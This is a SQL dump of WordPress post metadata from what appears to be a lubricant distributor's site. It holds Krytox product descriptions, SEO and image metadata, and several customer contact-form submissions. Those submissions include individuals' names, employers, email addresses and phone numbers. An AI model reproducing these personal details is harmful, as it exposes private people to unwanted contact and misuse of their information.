INSERT INTO `wp_postmeta` VALUES (21351, 2242, '_field_10', 'bharat electronics'); 
INSERT INTO `wp_postmeta` VALUES (21352, 2242, '_field_2', 'sureshpn@bel.co.in'); 
INSERT INTO `wp_postmeta` VALUES (21353, 2242, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (21354, 2242, '_field_3', 'Sir / Madam,\r\n                               We are in requirement of epoxy 907. KIndly inform us if it is available in stock.\r\n\r\nREgards\r\n\r\nsuresh\r\nBharat Elctronics\r\nBangalore\r\nIndia\r\nMob: 9449358953'); 
INSERT INTO `wp_postmeta` VALUES (21355, 2242, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21356, 2242, '_sub_id', '2242'); 
INSERT INTO `wp_postmeta` VALUES (21357, 2242, '_edit_lock', '1475675784:2'); 
INSERT INTO `wp_postmeta` VALUES (21358, 2243, '_wp_attached_file', '2016/10/Fluoroguard-e1475584461536.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21359, 2243, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:38:"2016/10/Fluoroguard-e1475584461536.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Fluoroguard-e1475584461536-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Fluoroguard-e1475584461536-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Fluoroguard-e1475584461536-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Fluoroguard-e1475584461536-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21360, 2243, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:15:"Fluoroguard.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:23:"Fluoroguard-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:23:"Fluoroguard-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"Fluoroguard-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"Fluoroguard-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (21361, 116, '_yoast_wpseo_linkdex', '48'); 
INSERT INTO `wp_postmeta` VALUES (21362, 790, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21363, 790, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21364, 347, '_wp_old_slug', 'gpl-200'); 
INSERT INTO `wp_postmeta` VALUES (21365, 347, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21366, 347, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21367, 769, '_wp_old_slug', 'gpl-201'); 
INSERT INTO `wp_postmeta` VALUES (21368, 769, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21369, 769, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21370, 783, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21371, 783, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21372, 784, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21373, 784, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21374, 788, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21375, 788, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21376, 814, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21377, 814, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21378, 2247, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21379, 2247, '_seq_num', '19'); 
INSERT INTO `wp_postmeta` VALUES (21380, 2247, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21381, 2247, '_field_12', 'Todd Lamb'); 
INSERT INTO `wp_postmeta` VALUES (21382, 2247, '_field_13', 'Atlanta Speedwerks'); 
INSERT INTO `wp_postmeta` VALUES (21383, 2247, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21384, 2247, '_field_14', 'todd@atlspeedwerks.com'); 
INSERT INTO `wp_postmeta` VALUES (21385, 2247, '_field_15', '(248) 797-0309'); 
INSERT INTO `wp_postmeta` VALUES (21386, 2247, '_field_16', 'Hello,\r\n\r\nWe are a race shop dealing with Porsche and Mazda. We have been using Redline grease to repack wheel bearings that see a lot of high stress and temp. It works but we are researching other products that might be better. Do you have any recommendations? I was looking at perhaps the GPL 227 or XP 2A0 or 2A1?\r\n\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (21387, 2247, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21388, 2247, '_sub_id', '2247'); 
INSERT INTO `wp_postmeta` VALUES (21389, 455, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21390, 402, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21391, 402, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21392, 818, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21393, 818, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21394, 819, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21395, 819, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21399, 821, '_wp_old_slug', 'gpl-214'); 
INSERT INTO `wp_postmeta` VALUES (21400, 821, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21401, 821, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21402, 822, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21403, 822, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21404, 823, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21405, 823, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21406, 824, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21407, 824, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21408, 410, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21409, 410, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21410, 410, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21411, 843, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21412, 843, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21413, 843, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21414, 846, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21415, 846, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21416, 846, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21417, 844, '_wp_old_slug', 'krytox-gpl-222-2'); 
INSERT INTO `wp_postmeta` VALUES (21418, 844, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21419, 844, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21420, 844, '_yoast_wpseo_linkdex', '90'); 
INSERT INTO `wp_postmeta` VALUES (21421, 847, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21422, 847, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21423, 848, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21424, 848, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21425, 848, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21426, 850, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21427, 850, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21428, 850, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21429, 852, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21430, 852, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21431, 852, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21432, 421, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21433, 421, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21434, 421, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21435, 436, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21436, 436, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21437, 436, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21438, 436, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21439, 436, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21440, 436, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21441, 436, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21442, 436, '_ywtm_content_tab_description', 'One of the greatest advantages of using Krytox GPL 101 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 101 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (21443, 437, '_wp_old_slug', 'gpl-102'); 
INSERT INTO `wp_postmeta` VALUES (21444, 437, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21445, 437, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21446, 437, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21447, 438, '_wp_old_slug', 'gpl-103'); 
INSERT INTO `wp_postmeta` VALUES (21448, 438, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21449, 438, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21450, 439, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21451, 439, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21452, 439, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21453, 440, '_wp_old_slug', 'gpl-105'); 
INSERT INTO `wp_postmeta` VALUES (21454, 440, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21455, 440, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21456, 440, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21457, 441, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21458, 441, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21459, 441, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21460, 442, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21461, 442, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21462, 442, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21463, 1088, '_wp_old_slug', 'gpl-246'); 
INSERT INTO `wp_postmeta` VALUES (21464, 1088, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21465, 1088, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21466, 1088, '_yoast_wpseo_linkdex', '60'); 
INSERT INTO `wp_postmeta` VALUES (21467, 1088, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21468, 1088, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21469, 1088, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21470, 1088, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21471, 1088, '_ywtm_content_tab_description', 'Some applications require electrical conductivity. Most greases act as insulators. This special grade of Krytox GPL 246 has been formulated with copper powder in grease to act as a conductor of electricity.\r\n\r\nKrytox oils provide long life and high-temperature stability and lubrication. The addition of copper powder also improves the thermal conductivity of the grease for applications where improved heat transfer is needed; however, it can increase bearing noise and wear. Because GPL 246 is formulated with our Krytox® GPL 106 base oil, it retains many of the properties\r\nof that oil. '); 
INSERT INTO `wp_postmeta` VALUES (21472, 1111, '_wp_old_slug', 'gpl-407'); 
INSERT INTO `wp_postmeta` VALUES (21473, 1111, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21474, 1111, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21475, 2255, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21476, 2255, '_seq_num', '20'); 
INSERT INTO `wp_postmeta` VALUES (21477, 2255, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21478, 2255, '_field_12', 'James Curran'); 
INSERT INTO `wp_postmeta` VALUES (21479, 2255, '_field_13', 'Fulcrum Safety Solutions, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (21480, 2255, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21481, 2255, '_field_14', 'jim@ehs-sos.com'); 
INSERT INTO `wp_postmeta` VALUES (21482, 2255, '_field_15', '(978) 649-2756'); 
INSERT INTO `wp_postmeta` VALUES (21483, 2255, '_field_16', 'I am updating SDSs for a customer (St Jude Medical in Westford, MA).  Please send me the most recent SDS for MS-136W.\n\nThank you!'); 
INSERT INTO `wp_postmeta` VALUES (21484, 2255, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21485, 2255, '_sub_id', '2255'); 
INSERT INTO `wp_postmeta` VALUES (21486, 642, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21487, 642, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21488, 643, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21489, 643, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21490, 644, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21491, 644, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21492, 645, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21493, 645, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21494, 638, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21495, 638, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21496, 647, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21497, 647, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21498, 648, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21499, 648, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21500, 647, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21501, 647, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21502, 647, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21503, 647, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21504, 647, '_ywtm_content_tab_description', 'Since the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250AC is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\nKrytox™ greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\r\n\r\nKrytox™ lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\r\n\r\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox™ oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\nAll standard grades of grease are thickened with high efficiency PTFE, whose formula is (CF2-CF2)n. This special high efficiency thickener has a melting point of 325°C (617 °F), and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.'); 
INSERT INTO `wp_postmeta` VALUES (21505, 648, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21506, 648, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21507, 648, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21508, 648, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21509, 648, '_ywtm_content_tab_description', 'Since the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250AD is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\nKrytox greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\r\n\r\nKrytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\r\n\r\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\nAll standard grades of grease are thickened with high efficiency PTFE, whose formula is (CF2-CF2)n. This special high efficiency thickener has a melting point of 325°C (617 °F), and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.'); 
INSERT INTO `wp_postmeta` VALUES (21510, 646, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21511, 646, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21512, 2259, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21513, 2259, '_seq_num', '27'); 
INSERT INTO `wp_postmeta` VALUES (21514, 2259, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21515, 2259, '_field_1', 'Elaine Lanza'); 
INSERT INTO `wp_postmeta` VALUES (21516, 2259, '_field_10', 'www.cytonix.com'); 
INSERT INTO `wp_postmeta` VALUES (21517, 2259, '_field_2', 'elanza@cytonix.com'); 
INSERT INTO `wp_postmeta` VALUES (21518, 2259, '_field_8', '(703) 929-5324'); 
INSERT INTO `wp_postmeta` VALUES (21519, 2259, '_field_3', 'I would like to obtain SDS and samples of the following products.\r\n\r\nEpikure 3213\r\nEpon 1001-CX-75'); 
INSERT INTO `wp_postmeta` VALUES (21520, 2259, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21521, 2259, '_sub_id', '2259'); 
INSERT INTO `wp_postmeta` VALUES (21522, 868, '_wp_old_slug', 'nrt-8900'); 
INSERT INTO `wp_postmeta` VALUES (21523, 868, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21524, 868, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21525, 868, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21526, 868, '_yoast_wpseo_focuskw_text_input', 'NRT 8900'); 
INSERT INTO `wp_postmeta` VALUES (21527, 868, '_yoast_wpseo_focuskw', 'NRT 8900'); 
INSERT INTO `wp_postmeta` VALUES (21528, 868, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21529, 868, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21530, 868, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21531, 868, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21532, 868, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21533, 868, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21534, 868, '_ywtm_content_tab_description', 'The NRT 8900 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \r\n\r\nKrytox greases in the NRT 8900 series have been specially formulated for reactive gas service. With Krytox™ base oil, the NRT greases have special thickeners and additives for use with reactive gas or chemical applications.\r\n\r\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\r\n\r\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\r\n\r\nKrytox NRT 8900 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective valve packing and seal lubricant for O-rings'); 
INSERT INTO `wp_postmeta` VALUES (21535, 868, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21546, 878, '_wp_old_slug', 'nrt-8904'); 
INSERT INTO `wp_postmeta` VALUES (21547, 878, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21548, 878, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21549, 878, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21550, 878, '_yoast_wpseo_focuskw_text_input', 'Krytox NRT 8904'); 
INSERT INTO `wp_postmeta` VALUES (21551, 878, '_yoast_wpseo_focuskw', 'Krytox NRT 8904'); 
INSERT INTO `wp_postmeta` VALUES (21552, 878, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21553, 878, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21554, 880, '_wp_old_slug', 'nrt-8906'); 
INSERT INTO `wp_postmeta` VALUES (21555, 880, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21556, 880, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21557, 880, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21558, 880, '_yoast_wpseo_focuskw_text_input', 'Krytox NRT 8906'); 
INSERT INTO `wp_postmeta` VALUES (21559, 880, '_yoast_wpseo_focuskw', 'Krytox NRT 8906'); 
INSERT INTO `wp_postmeta` VALUES (21560, 880, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21561, 880, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21562, 881, '_wp_old_slug', 'nrt-8908'); 
INSERT INTO `wp_postmeta` VALUES (21563, 881, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21564, 881, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21565, 881, '_yoast_wpseo_focuskw_text_input', 'Krytox NRT 8908'); 
INSERT INTO `wp_postmeta` VALUES (21566, 881, '_yoast_wpseo_focuskw', 'Krytox NRT 8908'); 
INSERT INTO `wp_postmeta` VALUES (21567, 2259, '_edit_lock', '1475675747:2'); 
INSERT INTO `wp_postmeta` VALUES (21569, 943, '_yoast_wpseo_linkdex', '92'); 
INSERT INTO `wp_postmeta` VALUES (21570, 943, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21571, 943, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21572, 943, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21573, 943, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21574, 943, '_ywtm_content_tab_description', 'Krytox VPF, vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. They can replace competitive PFPE fluids as well as any other type of vacuum fluid. Krytox™ fluids do not contain acetal groups, which are susceptible to attack by Lewis acids. This gives Krytox™ superior stability as a vacuum pump fluid. Krytox vacuum fluids are precisely distilled to provide\r\nlow vapor pressures and superior performance. In addition, Krytox fluids are recyclable.\r\n\r\nWhile Krytox VPF fluids are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox™ XP products have not been tested with all materials. Initial testing has shown no problems with Teflon™ fluoroplastic resin, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. The performance of the soluble additives could degrade at temperatures more than 182 °C (360 °F) over a long period of time.\r\n\r\n<strong>High Vacuum Grease</strong>\r\nKrytox LVP is a high vacuum grease formulated with a special low vapor pressure Krytox oil for high-vacuum applications. It is also useful for sealing laboratory glassware connections and as a thread lubricant/sealant.'); 
INSERT INTO `wp_postmeta` VALUES (21575, 944, '_yoast_wpseo_linkdex', '92'); 
INSERT INTO `wp_postmeta` VALUES (21576, 954, '_yoast_wpseo_linkdex', '92'); 
INSERT INTO `wp_postmeta` VALUES (21577, 2265, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21578, 2265, '_seq_num', '29'); 
INSERT INTO `wp_postmeta` VALUES (21579, 2265, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21580, 2265, '_field_1', 'Jared'); 
INSERT INTO `wp_postmeta` VALUES (21581, 2265, '_field_10', 'SMR'); 
INSERT INTO `wp_postmeta` VALUES (21582, 2265, '_field_2', 'jsommer@alum.mit.edu'); 
INSERT INTO `wp_postmeta` VALUES (21583, 2265, '_field_8', '(801) 631-5500'); 
